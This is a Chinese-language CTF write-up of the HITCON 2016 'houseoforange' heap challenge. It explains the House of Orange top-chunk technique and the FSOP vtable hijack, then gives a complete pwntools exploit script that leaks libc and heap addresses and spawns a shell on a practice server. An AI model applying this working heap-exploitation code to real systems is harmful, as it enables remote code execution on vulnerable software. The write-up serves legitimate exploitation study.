houseoforange_hitcon_2016
查看保护
这一题目就是使用house of orange + FSOP来解决
在edit的时候会让用户输入size,这里有一个堆溢出(笔者认为这一题还有一个考点就是逆清楚这个程序,自己增加结构体
这是笔者加的两个结构体,看成这样就行
struct Data{
Info *info;
char *name
}
struct Info{
int price;
int color;
}
加了这个之后改一下堆块的类型就可以更快的清楚这个程序的结构。
回归正题,在edit的时候有一个溢出,没有delete这个功能
攻击思路:1)没有delete有一个堆溢出,可以借助这个堆溢出来使用house of orange这个方法来产生一个被释放的堆块,就是改top chunk即可,这个需要4kb对齐。
2)有了堆块之后利用FSOP来劫持vtable执行system("/bin/sh");
1.首先创建一个堆块用来改top chunk。
2.改top chunk为0xfa1,0x555555606060 + 0xfa0 = 0x555555607000(4kb对齐)
3.创建一个超过0xfa1的堆块使得top chunk释放掉,这个时候0xfa1进入了unstorted bin。
4.利用unstorted bin泄露出Libc和heap_addr,这一步是为了下面的FSOP attack做准备
5.伪造IOfile结构将vtable改成system,这一步就是FSOP的开始。
6.伪造io file的头为/bin/sh,这样的话在malloc_printer错误的时候会调用io_overflow
_IO_OVERFLOW改为system,并且伪造结构体,开头为/bin/sh,就能获得shell了
7.想要执行io_overflow还需要fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base
这个条件或者_IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
这个条件。
具体的io的话可以看看z1r0’s blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 29059)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'Your choice : '
def add(size, name, price, color):
r.sendlineafter(menu, '1')
r.sendlineafter('Length of name :', str(size))
r.sendafter('Name :', name)
r.sendlineafter('Price of Orange:', str(price))
r.sendlineafter('Color of Orange:', str(color))
def show():
r.sendlineafter(menu, '2')
def edit(size, name, price, color):
r.sendlineafter(menu, '3')
r.sendlineafter('Length of name :', str(size))
r.sendlineafter('Name:', name)
r.sendlineafter('Price of Orange: ', str(price))
r.sendafter('Color of Orange: ', str(color))
add(0x10, 'aaaa', 0xff, 1)
p1 = b'a' * 0x10 + p64(0) + p64(0x21) + p64(0) * 3 + p64(0xfa1)
edit(0x50, p1, 0xff, 1)
add(0x1000, 'aaaa', 0xff, 1)
add(0x400, 'b' * 8, 0xff, 1)
show()
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 1640 - 0x10
success('malloc_hook = ' + hex(malloc_hook))
libc = ELF('libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
io_list_all = libc_base + libc.sym["_IO_list_all"]
edit(0x10, b'b' * 0x10, 0xddaa, 0xddaa)
show()
r.recvuntil('b' * 0x10)
heap_addr = u64(r.recvuntil('\n').strip().ljust(8, b'\x00'))
success('heap_addr = ' + hex(heap_addr))
one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base
system_addr = libc_base + libc.sym['system']
p1 = flat(p64(0) * 3 + p64(system_addr),
0x400 * "\x00",
"/bin/sh\x00",
0x61,
0,
io_list_all - 0x10,
0,
0x1,
0xa8 * b"\x00",
heap_addr+0x10
)
edit(0x600, p1, 0xddaa, 0xddaa)
r.sendlineafter("Your choice : ", "1")
r.interactive()